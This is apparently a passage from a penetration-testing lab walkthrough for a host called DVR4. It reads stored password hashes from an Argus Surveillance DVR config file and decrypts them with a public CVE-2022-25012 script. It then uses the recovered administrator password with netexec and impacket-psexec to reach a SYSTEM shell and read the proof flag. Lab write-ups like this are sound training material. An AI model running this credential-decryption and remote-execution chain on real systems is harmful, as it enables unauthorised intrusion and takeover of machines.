Priv Esc

C:\Users\viewer>type "C:\programdata\PY_Software\Argus Surveillance DVR\DVRParams.ini"

ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A8
5E534D7B6069F641E03BD9BD956BC875EB603CD9D8E1BD8FAAFE

git clone https://github.com/s3l33/CVE-2022-25012.git

$ python CVE-2022-25012.py ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A8

$ netexec smb 192.168.151.179 -u 'Administrator' -p '14WatchD0g$'

$ impacket-psexec Administrator:'14WatchD0g$'@192.168.151.179                                                       
Impacket v0.12.0.dev1+20240807.21946.829239e - Copyright 2023 Fortra

[*] Requesting shares on 192.168.151.179.....
[*] Found writable share ADMIN$
[*] Uploading file NGrMDuKE.exe
[*] Opening SVCManager on 192.168.151.179.....
[*] Creating service rLbH on 192.168.151.179.....
[*] Starting service rLbH.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.19044.1645]
(c) Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32> hostname && whoami.exe && type C:\Users\Administrator\Desktop\proof.txt && ipconfig
DVR4
nt authority\system
04f0f21abdd5d60c6860e64f1c416a2e

Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.151.179
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.151.254

C:\WINDOWS\system32>

PreviousEnumeration NextCredentials / Notes / LL

Last updated 6 months ago